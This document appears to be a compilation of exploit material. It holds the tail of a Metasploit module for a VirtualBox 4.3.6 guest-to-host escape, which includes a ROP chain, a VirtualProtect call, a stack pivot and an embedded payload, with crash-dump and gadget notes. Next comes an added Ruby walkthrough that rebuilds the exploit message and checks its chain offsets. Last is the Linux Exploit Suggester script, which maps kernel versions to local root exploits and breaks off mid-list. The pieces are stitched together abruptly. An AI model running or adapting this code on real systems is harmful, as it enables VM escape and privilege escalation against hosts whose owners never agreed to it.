    msg[4, 4] = [@client_id].pack("V") # u32ClientID
    msg[8, 4] = [SHCRGL_GUEST_FN_INJECT].pack("V")
    msg[12, 4] = [SHCRGL_CPARMS_INJECT].pack("V")
    msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
    msg[20, 4] = [@client_id].pack("V") # u32ClientID
    msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR].pack("V")
    msg[32, 4] = [buff_length].pack("V") # size_of(buf)
    msg[36, 4] = [buff_addr].pack("V")   # (buf)

    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)
    result
  end

  def stack_adjustment
    pivot = "\x65\x8b\x04\x25\x10\x00\x00\x00" # "mov eax,dword ptr gs:[10h]" # Get Stack Bottom from TEB
    pivot << "\x89\xc4"                         # mov esp, eax                 # Store stack bottom in esp
    pivot << "\x81\xC4\x30\xF8\xFF\xFF"         # add esp, -2000               # Plus a little offset...
    pivot
  end

  def target_virtualbox_436_win7_64(message_id)
    opcodes = [0xFF, 0xea, 0x02, 0xf7]

    opcodes_hdr = [
      0x77474c01,    # type CR_MESSAGE_OPCODES
      0x8899,        # conn_id
      opcodes.length # numOpcodes
    ]

    if message_id == 2 # Message used to achieve Code execution
      # See at the end of the module for a better description of the ROP Chain,
      # or even better, read: http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php
      # All gadgets from VBoxREM.dll
      opcodes_data = [0x8, 0x30, 0x331].pack("V*")
      opcodes_data << [0x6a68599a].pack("Q<") # Gadget 2 # pop rdx # xor ecx,dword ptr [rax] # add cl,cl # movzx eax,al # ret
      opcodes_data << [112].pack("Q<")        # RDX
      opcodes_data << [0x6a70a560].pack("Q<") # Gadget 3 # lea rax,[rsp+8] # ret
      opcodes_data << [0x6a692b1c].pack("Q<") # Gadget 4 # lea rax,[rdx+rax] # ret
      opcodes_data << [0x6a6931d6].pack("Q<") # Gadget 5 # add dword ptr [rax],eax # add cl,cl # ret
      opcodes_data << [0x6a68124e].pack("Q<") # Gadget 6 # pop r12 # ret
      opcodes_data << [0x6A70E822].pack("Q<") # R12 := ptr to .data in VBoxREM.dll (4th argument lpflOldProtect)
      opcodes_data << [0x6a70927d].pack("Q<") # Gadget 8 # mov r9,r12 # mov r8d,dword ptr [rsp+8Ch] # mov rdx,qword ptr [rsp+68h] # mov rdx,qword ptr [rsp+68h] # call rbp
      opcodes_data << Rex::Text.pattern_create(80)
      opcodes_data << [0].pack("Q<")          # 1st arg (lpAddress) # chain will store stack address here
      opcodes_data << Rex::Text.pattern_create(104 - 80 - 8)
      opcodes_data << [0x2000].pack("Q<")     # 2nd arg (dwSize)
      opcodes_data << Rex::Text.pattern_create(140 - 104 - 8)
      opcodes_data << [0x40].pack("V")        # 3rd arg (flNewProtect)
      opcodes_data << Rex::Text.pattern_create(252 - 4 - 140 - 64)
      opcodes_data << [0x6A70BB20].pack("V")  # ptr to jmp VirtualProtect instr.
      opcodes_data << "A" * 8
      opcodes_data << [0x6a70a560].pack("Q<") # Gadget 9
      opcodes_data << [0x6a6c9d3d].pack("Q<") # Gadget 10
      opcodes_data << "\xe9\x5b\x02\x00\x00"  # jmp $+608
      opcodes_data << "A" * (624 - 24 - 5)
      opcodes_data << [0x6a682a2a].pack("Q<") # Gadget 1 # xchg eax, esp # ret # stack pivot
      opcodes_data << stack_adjustment
      opcodes_data << payload.encoded
      opcodes_data << Rex::Text.pattern_create(8196 - opcodes_data.length)
    else # Message used to corrupt head_spu
      # 0x2a9 => offset to head_spu in VBoxSharedCrOpenGL.dll .data
      # 8196 => On my tests, this data size allows to keep the memory
      # not reused until the second packet arrives. The second packet,
      # of course, must have 8196 bytes length too. So this memory is
      # reused and code execution can be accomplished.
      opcodes_data = [0x8, 0x30, 0x331, 0x2a9].pack("V*")
      opcodes_data << "B" * (8196 - opcodes_data.length)
    end

    msg = opcodes_hdr.pack("V*") + opcodes.pack("C*") + opcodes_data
    msg
  end

  def send_opcodes_msg(process, message_id)
    msg = self.send(target[:messages], message_id)
    mem = process.memory.allocate(msg.length + (msg.length % 1024))
    process.memory.write(mem, msg)
    trigger(mem, msg.length)
  end

  def check
    handle = open_device
    if handle.nil?
      return Exploit::CheckCode::Safe
    end

    session.railgun.kernel32.CloseHandle(handle)
    Exploit::CheckCode::Detected
  end

  def exploit
    unless self.respond_to?(target[:messages])
      print_error("Invalid target specified: no messages callback function defined")
      return
    end

    print_status("Opening device...")
    @handle = open_device
    if @handle.nil?
      fail_with(Failure::NoTarget, "#{DEVICE} device not found")
    else
      print_good("#{DEVICE} found, exploiting...")
    end

    print_status("Connecting to the service...")
    @client_id = connect
    if @client_id.nil?
      fail_with(Failure::Unknown, "Connect operation failed")
    end
    print_good("Client ID #{@client_id}")

    print_status("Calling SET_VERSION...")
    result = set_version
    if result.nil?
      fail_with(Failure::Unknown, "Failed to SET_VERSION")
    end

    this_pid = session.sys.process.getpid
    print_status("Calling SET_PID...")
    result = set_pid(this_pid)
    if result.nil?
      fail_with(Failure::Unknown, "Failed to SET_PID")
    end

    this_proc = session.sys.process.open

    print_status("Sending First 0xEA Opcode Message to control head_spu...")
    result = send_opcodes_msg(this_proc, 1)
    if result.nil?
      fail_with(Failure::Unknown, "Failed to control heap_spu...")
    end

    print_status("Sending Second 0xEA Opcode Message to execute payload...")
    @old_timeout = session.response_timeout
    session.response_timeout = 5
    begin
      send_opcodes_msg(this_proc, 2)
    rescue Rex::TimeoutError
      vprint_status("Expected timeout in case of successful exploitation")
    end
  end

  def cleanup
    unless @old_timeout.nil?
      session.response_timeout = @old_timeout
    end

    if session_created? # Unless we add CoE there is nothing to do
      return
    end

    unless @client_id.nil?
      print_status("Disconnecting from the service...")
      disconnect
    end

    unless @handle.nil?
[/code]
print_status("Closing the device...") session.railgun.kernel32.CloseHandle(@handle) end end end =begin * VirtualBox 4.3.6 / Windows 7 SP1 64 bits Crash after second message: 0:013> dd rax 00000000`0e99bd44 41306141 61413161 33614132 41346141 00000000`0e99bd54 61413561 37614136 41386141 62413961 00000000`0e99bd64 31624130 41326241 62413362 35624134 00000000`0e99bd74 41366241 62413762 39624138 41306341 00000000`0e99bd84 63413163 33634132 41346341 63413563 00000000`0e99bd94 37634136 41386341 64413963 31644130 00000000`0e99bda4 41326441 64413364 35644134 41366441 00000000`0e99bdb4 64413764 39644138 41306541 65413165 0:013> r rax=000000000e99bd44 rbx=0000000000000001 rcx=000007fef131e8ba rdx=000000006a72fb62 rsi=000000000e5531f0 rdi=0000000000000000 rip=000007fef12797f8 rsp=0000000004b5f620 rbp=0000000041424344 << already controlled... r8=0000000000000001 r9=00000000000005c0 r10=0000000000000000 r11=0000000000000246 r12=0000000000000000 r13=00000000ffffffff r14=000007fef1f90000 r15=0000000002f6e280 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 VBoxSharedCrOpenGL!crServerAddNewClient+0x208: 000007fe`f12797f8 ff9070030000 call qword ptr [rax+370h] ds:00000000`0e99c0b4=7641397541387541 Gadget 1: Stack Pivot # 0x6a682a2a xchg eax,esp 94 ret c3 Gadget 2: Control RDX value # 0x6a68599a pop rdx 5a xor ecx,dword ptr [rax] 33 08 add cl,cl 00 c9 movzx eax,al 0f b6 c0 ret c3 Gadget 3: Store ptr to RSP in RAX # 0x6a70a560 lea rax,[rsp+8] 48 8d 44 24 08 ret c3 Gadget 4: Store ptr to RSP + RDX offset (controlled) in RAX # 0x6a692b1c lea rax,[rdx+rax] 48 8d 04 02 ret c3 Gadget 5: Write Stack Address (EAX) to the stack # 0x6a6931d6 add dword ptr [rax],eax 01 00 add cl,cl 00 c9 ret c3 Gadget 6: Control R12 # 0x6a68124e pop r12 ret Gadget 7: Recover VirtualProtect arguments from the stack and call it (ebp) # 0x6a70927d mov r9,r12 4d 89 e1 mov r8d,dword ptr [rsp+8Ch] 44 8b 84 24 8c 00 00 00 mov rdx,qword ptr [rsp+68h] 48 8b 54 24 68 mov 
rcx,qword ptr [rsp+50h] 48 8b 4c 24 50 call rbp ff d5 Gadget 8: After VirtualProtect, get pointer to the shellcode in the # 0x6a70a560 lea rax, [rsp+8] 48 8d 44 24 08 ret c3 Gadget 9: Push the pointer and provide control to shellcode # 0x6a6c9d3d push rax 50 adc cl,ch 10 e9 ret c3 =end Source: http://www.exploit-db.com/exploits/34334/
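The module's second 0xEA message only works if every offset in it lines up with what the gadgets read: the `call qword ptr [rax+370h]` in crServerAddNewClient has to land on the stack pivot, gadget 7 has to find the VirtualProtect arguments at `[rsp+50h]`, `[rsp+68h]` and `[rsp+8Ch]`, and the `jmp $+608` has to land on the pivot stub that precedes the payload. The block below is an added example, not code from the exploit-db module: it rebuilds the message with the same packing and walks the chain the way the gadgets would, so the layout can be checked without a VirtualBox guest. Assumptions: `filler()` stands in for `Rex::Text.pattern_create`, a dummy payload stands in for `payload.encoded`, the heap address `base` is arbitrary, and the return from VirtualProtect is assumed to land on the slot holding the second `lea rax,[rsp+8]` gadget, since gadget 7's epilogue is not shown on the page.

```ruby
# Added example: rebuild the module's second 0xEA message and walk its ROP
# chain symbolically. Not part of the exploit-db module; filler(), the dummy
# payload and `base` are assumptions of this example.

CHAIN_BASE   = 12      # opcodes_data[0, 12] holds the three leading dwords
VCALL_OFFSET = 0x370   # crServerAddNewClient: call qword ptr [rax+370h]
RCX_SLOT     = 0x50    # gadget 7: mov rcx,qword ptr [rsp+50h]  (lpAddress)
RDX_SLOT     = 0x68    # gadget 7: mov rdx,qword ptr [rsp+68h]  (dwSize)
R8D_SLOT     = 0x8c    # gadget 7: mov r8d,dword ptr [rsp+8Ch]  (flNewProtect)

G_PIVOT    = 0x6a682a2a # xchg eax,esp ; ret
G_POP_RDX  = 0x6a68599a # pop rdx ; ... ; ret
G_LEA_RSP8 = 0x6a70a560 # lea rax,[rsp+8] ; ret
G_LEA_ADD  = 0x6a692b1c # lea rax,[rdx+rax] ; ret
G_ADD_MEM  = 0x6a6931d6 # add dword ptr [rax],eax ; ... ; ret
G_POP_R12  = 0x6a68124e # pop r12 ; ret
G_CALL_RBP = 0x6a70927d # mov r9,r12 ; loads r8d/rdx/rcx from the stack ; call rbp
G_PUSH_RAX = 0x6a6c9d3d # push rax ; adc cl,ch ; ret
OLD_PROTECT_PTR = 0x6A70E822 # writable .data slot used as lpflOldProtect
VP_THUNK_PTR    = 0x6A70BB20 # ptr to a jmp VirtualProtect, reaches rbp

# mov eax,gs:[10h] ; mov esp,eax ; add esp,-2000  (the module's stack_adjustment)
STACK_PIVOT = "\x65\x8b\x04\x25\x10\x00\x00\x00\x89\xc4\x81\xC4\x30\xF8\xFF\xFF".b

def filler(n)
  ("A".."Z").to_a.cycle.take(n).join.b  # stand-in for Rex::Text.pattern_create
end

def build_message2(payload)
  d = [0x8, 0x30, 0x331].pack("V*")
  d << [G_POP_RDX, 112, G_LEA_RSP8, G_LEA_ADD, G_ADD_MEM,
        G_POP_R12, OLD_PROTECT_PTR, G_CALL_RBP].pack("Q<*")
  d << filler(80) << [0].pack("Q<")                   # lpAddress, written by gadget 5
  d << filler(104 - 80 - 8) << [0x2000].pack("Q<")    # dwSize
  d << filler(140 - 104 - 8) << [0x40].pack("V")      # flNewProtect (PAGE_EXECUTE_READWRITE)
  d << filler(252 - 4 - 140 - 64) << [VP_THUNK_PTR].pack("V")
  d << "A" * 8 << [G_LEA_RSP8, G_PUSH_RAX].pack("Q<*")
  d << "\xe9\x5b\x02\x00\x00".b                       # jmp $+608
  d << "A" * (624 - 24 - 5)
  d << [G_PIVOT].pack("Q<") << STACK_PIVOT << payload.b
  d << filler(8196 - d.bytesize)
end

def qword(d, off)
  d[off, 8].unpack1("Q<")
end

# Walk the chain exactly as the gadgets would. `base` is the (unknown) 32-bit
# heap address of opcodes_data; all other values are offsets into it.
def simulate_chain(d, base = 0x0e990000)
  d = d.dup
  raise "no pivot at rax+0x370" unless qword(d, CHAIN_BASE + VCALL_OFFSET) == G_PIVOT
  rsp = CHAIN_BASE                        # xchg eax,esp: the message becomes the stack
  pop = lambda { v = qword(d, rsp); rsp += 8; v }

  raise "chain order" unless pop.call == G_POP_RDX
  rdx = pop.call                          # pop rdx
  raise "chain order" unless pop.call == G_LEA_RSP8
  rax = rsp + 8                           # lea rax,[rsp+8]
  raise "chain order" unless pop.call == G_LEA_ADD
  rax = rdx + rax                         # lea rax,[rdx+rax]
  raise "chain order" unless pop.call == G_ADD_MEM
  lp_slot = rax                           # add [rax],eax: the slot receives its own address
  lp_address = (base + lp_slot) & 0xffffffff
  d[lp_slot, 4] = [(d[lp_slot, 4].unpack1("V") + lp_address) & 0xffffffff].pack("V")
  raise "chain order" unless pop.call == G_POP_R12
  r12 = pop.call                          # pop r12
  raise "chain order" unless pop.call == G_CALL_RBP

  # gadget 7 assembles the VirtualProtect call from the stack it now sits on
  args = { rcx_from: rsp + RCX_SLOT, rcx: qword(d, rsp + RCX_SLOT),
           rdx: qword(d, rsp + RDX_SLOT), r8d: d[rsp + R8D_SLOT, 4].unpack1("V"), r9: r12 }

  # Assumption: VirtualProtect returns to the slot holding the second lea gadget.
  resume = d.index([G_LEA_RSP8, G_PUSH_RAX].pack("Q<*"), rsp)
  raise "resume gadgets missing" unless resume
  rsp = resume
  raise "chain order" unless pop.call == G_LEA_RSP8
  rax = rsp + 8                           # points at the jmp $+608
  raise "chain order" unless pop.call == G_PUSH_RAX
  rip = rax                               # push rax ; ret
  raise "not a jmp rel32" unless d[rip] == "\xe9".b
  pivot_at = rip + 5 + d[rip + 1, 4].unpack1("l<")
  raise "jmp misses the pivot stub" unless d[pivot_at, STACK_PIVOT.bytesize] == STACK_PIVOT

  args.merge(lp_slot: lp_slot, lp_address: lp_address, jmp_at: rip,
             pivot_at: pivot_at, payload_at: pivot_at + STACK_PIVOT.bytesize)
end
```

The interesting property the walk makes visible is that `lpAddress` is never a fixed value: gadget 5 adds `eax` to the zeroed slot, so the slot ends up holding its own (low 32-bit) address, and VirtualProtect(lpAddress, 0x2000, PAGE_EXECUTE_READWRITE, ...) then covers the rest of the message, including the pivot stub and the payload that follow it.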
  15. So that you don't have to search for exploits manually anymore.

Source: https://github.com/PenturaLabs/Linux_Exploit_Suggester

#!/usr/bin/perl
use strict;
use warnings;
use Getopt::Std;

our $VERSION = '0.9';

my %opts;
getopt( 'k,h', \%opts );

usage() if exists $opts{h};

my ( $khost, $is_partial ) = get_kernel();
print "\nKernel local: $khost\n\n";

my %exploits = get_exploits();
print 'Searching among ' . scalar keys(%exploits) . " exploits...\n\n";

print "Possible Exploits:\n";

EXPLOIT:
foreach my $key ( sort keys %exploits ) {
    foreach my $kernel ( @{ $exploits{$key}{vuln} } ) {
        if ( $khost eq $kernel or ( $is_partial and index($kernel,$khost) == 0 ) ) {
            print "[+] $key";
            print " ($kernel)" if $is_partial;

            my $alt = $exploits{$key}{alt};
            my $cve = $exploits{$key}{cve};
            my $mlw = $exploits{$key}{mil};

            if ( $alt or $cve ) {
                print "\n";
            }
            if ( $alt ) {
                print "   Alt: $alt ";
            }
            if ( $cve ) {
                print "   CVE-$cve";
            }
            if ( $mlw ) {
                print "\n   Source: $mlw";
            }
            print "\n";
            next EXPLOIT;
        }
    }
}

exit;

######################
##  extra functions ##
######################

sub get_kernel {
    my $khost = '';
    if ( exists $opts{k} ) {
        $khost = $opts{k};
    }
    else {
        $khost = `uname -r |cut -d"-" -f1`;
        chomp $khost;
    }

    # partial kernels might be provided by the user,
    # such as '2.4' or '2.6.'
    my $is_partial = $khost =~ /^\d+\.\d+\.?\d?/ ? 0 : 1;
    if ( $is_partial and substr($khost,-1) ne '.' ) {
        $khost .= '.';
    }

    return ( $khost, $is_partial );
}

sub usage {
    print <<"EOUSAGE";
Linux Exploit Suggester $VERSION
Usage: \t$0 [-h] [-k kernel]

  [-h] help (this message)
  [-k] kernel number eg. 2.6.28

You can also provide a partial kernel version (eg. 2.4)
to see all exploits available.

EOUSAGE
}

sub get_exploits {
    return (
        'w00t' => {
            vuln => [ '2.4.10', '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21', ]
        },
        'brk' => {
            vuln => [ '2.4.10', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
        },
        'ave' => { vuln => [ '2.4.19', '2.4.20' ] },
        'elflbl' => {
            vuln => ['2.4.29'],
            mil  => 'http://www.exploit-db.com/exploits/744/',
        },
        'elfdump'      => { vuln => ['2.4.27'] },
        'elfcd'        => { vuln => ['2.6.12'] },
        'expand_stack' => { vuln => ['2.4.29'] },
        'h00lyshit' => {
            vuln => [ '2.6.8', '2.6.10', '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', ],
            cve => '2006-3626',
            mil => 'http://www.exploit-db.com/exploits/2013/',
        },
        'kdump' => { vuln => ['2.6.13'] },
        'km2'   => { vuln => [ '2.4.18', '2.4.22' ] },
        'krad'  => { vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ] },
        'krad3' => {
            vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ],
            mil  => 'http://exploit-db.com/exploits/1397',
        },
        'local26' => { vuln => ['2.6.13'] },
        'loko'    => { vuln => [ '2.4.22', '2.4.23', '2.4.24' ] },
        'mremap_pte' => {
            vuln => [ '2.4.20', '2.2.24', '2.4.25', '2.4.26', '2.4.27' ],
            mil  => 'http://www.exploit-db.com/exploits/160/',
        },
        'newlocal' => { vuln => [ '2.4.17', '2.4.19' ] },
        'ong_bak'  => { vuln => ['2.6.5'] },
        'ptrace'   => { vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ] },
        'ptrace_kmod' => {
            vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
            cve  => '2007-4573',
        },
        'ptrace_kmod2' => {
            vuln => [ '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', ],
            alt => 'ia32syscall,robert_you_suck',
            mil => 'http://www.exploit-db.com/exploits/15023/',
            cve => '2010-3301',
        },
        'ptrace24' => { vuln => ['2.4.9'] },
        'pwned'    => { vuln => ['2.6.11'] },
        'py2'      => { vuln => [ '2.6.9', '2.6.17', '2.6.15', '2.6.13' ] },
        'raptor_prctl' => {
            vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
            cve  => '2006-2451',
            mil  => 'http://www.exploit-db.com/exploits/2031/',
        },
        'prctl' => {
            vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
            mil  => 'http://www.exploit-db.com/exploits/2004/',
        },
        'prctl2' => {
            vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
            mil  => 'http://www.exploit-db.com/exploits/2005/',
        },
        'prctl3' => {
            vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
            mil  => 'http://www.exploit-db.com/exploits/2006/',
        },
        'prctl4' => {
            vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
            mil  => 'http://www.exploit-db.com/exploits/2011/',
        },
        'remap'      => { vuln => ['2.4.'] },
        'rip'        => { vuln => ['2.2.'] },
        'stackgrow2' => { vuln => [ '2.4.29', '2.6.10' ] },
        'uselib24'   => { vuln => [ '2.6.10', '2.4.17', '2.4.22', '2.4.25', '2.4.27', '2.4.29' ] },
        'newsmp'     => { vuln => ['2.6.'] },
        'smpracer'   => { vuln => ['2.4.29'] },
        'loginx'     => { vuln => ['2.4.22'] },
        'exp.sh'     => { vuln => [ '2.6.9', '2.6.10', '2.6.16', '2.6.13' ] },
        'vmsplice1' => {
            vuln => [ '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.24.1', ],
            alt => 'jessica biel',
            cve => '2008-0600',
            mil => 'http://www.exploit-db.com/exploits/5092',
        },
        'vmsplice2' => {
            vuln => [ '2.6.23', '2.6.24' ],
            alt  => 'diane_lane',
            cve  => '2008-0600',
            mil  => 'http://www.exploit-db.com/exploits/5093',
        },
        'vconsole' => {
            vuln => ['2.6.'],
            cve  => '2009-1046',
        },
        'sctp' => {
            vuln => ['2.6.26'],
            cve  => '2008-4113',
        },
        'ftrex' => {
            vuln => [ '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', ],
            cve => '2008-4210',
            mil => 'http://www.exploit-db.com/exploits/6851',
        },
        'exit_notify' => {
            vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
            mil  => 'http://www.exploit-db.com/exploits/8369',
        },
        'udev' => {
            vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
            alt  => 'udev <1.4.1',
            cve  => '2009-1185',
            mil  => 'http://www.exploit-db.com/exploits/8478',
        },
        'sock_sendpage2' => {
            vuln => [
                '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9', '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14',
                '2.4.15', '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22', '2.4.23', '2.4.24', '2.4.25',
                '2.4.26', '2.4.27', '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33', '2.4.34', '2.4.35', '2.4.36', '2.4.37',
                '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10',
                '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20',
                '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
            ],
            alt => 'proto_ops',
            cve => '2009-2692',
            mil => 'http://www.exploit-db.com/exploits/9436',
        },
        'sock_sendpage' => {
            vuln => [
                '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9', '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14',
                '2.4.15', '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22', '2.4.23', '2.4.24', '2.4.25',
                '2.4.26', '2.4.27', '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33', '2.4.34', '2.4.35', '2.4.36', '2.4.37',
                '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10',
                '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20',
                '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
            ],
            alt => 'wunderbar_emporium',
            cve => '2009-2692',
            mil => 'http://www.exploit-db.com/exploits/9435',
        },
        'udp_sendmsg_32bit' => {
            vuln => [
                '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10',
                '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19',
            ],
            cve => '2009-2698',
            mil => 'http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c',
        },
        'pipe.c_32bit' => {
            vuln => [
                '2.4.4', '2.4.5', '2.4.6', '2.4.7', '2.4.8', '2.4.9', '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14',
                '2.4.15', '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22', '2.4.23', '2.4.24', '2.4.25',
                '2.4.26', '2.4.27', '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33', '2.4.34', '2.4.35', '2.4.36', '2.4.37',
                '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
                '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31',
            ],
            cve => '2009-3547',
            mil => 'http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c',
        },
        'do_pages_move' => {
            vuln => [
                '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24',
                '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31',
            ],
            alt => 'sieve',
            cve => '2010-0415',
            mil => 'Spenders Enlightenment',
        },
        'reiserfs' => {
            vuln => [
                '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26',
                '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34',
            ],
            cve => '2010-1146',
            mil => 'http://www.exploit-db.com/exploits/12130/',
        },
        'can_bcm' => {
            vuln => [
                '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27',
                '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36',
            ],
            cve => '2010-2959',
            mil => 'http://www.exploit-db.com/exploits/14814/',
        },
        'rds' => {
            vuln => [ '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36', ],
            mil => 'http://www.exploit-db.com/exploits/15285/',
            cve => '2010-3904',
        },
        'half_nelson' => {
            vuln => [
                '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10',
                '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20',
                '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
                '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36',
            ],
            alt => 'econet',
            cve => '2010-3848',
            mil => 'http://www.exploit-db.com/exploits/6851',
        },
        'half_nelson1' => {
            vuln => [
                '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10',
                '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20',
                '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
                '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36',
            ],
            alt => 'econet',
            cve => '2010-3848',
            mil => 'http://www.exploit-db.com/exploits/17787/',
        },
        'half_nelson2' => {
            vuln => [
                '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10',
                '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20',
                '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
                '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36',
            ],
            alt => 'econet',
            cve => '2010-3850',
            mil => 'http://www.exploit-db.com/exploits/17787/',
        },
        'half_nelson3' => {
            vuln => [
                '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10',
                '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20',
                '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
                '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36',
            ],
            alt => 'econet',
            cve => '2010-4073',
            mil => 'http://www.exploit-db.com/exploits/17787/',
        },
        'caps_to_root' => {
            vuln => [ '2.6.34', '2.6.35', '2.6.36' ],
            cve  => 'n/a',
            mil  => 'http://www.exploit-db.com/exploits/15916/',
        },
        'american-sign-language' => {
            vuln => [
                '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10',
                '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19', '2.6.20',
                '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
                '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36',
            ],
            cve => '2010-4347',
            mil => 'http://www.securityfocus.com/bid/45408/',
        },
        'pktcdvd' => {
            vuln => [
                '2.6.0', '2.6.1', '2.6.2', '2.6.3', '2.6.4', '2.6.5', '2.6.6', '2.6.7', '2.6.8', '2.6.9', '2.6.10',
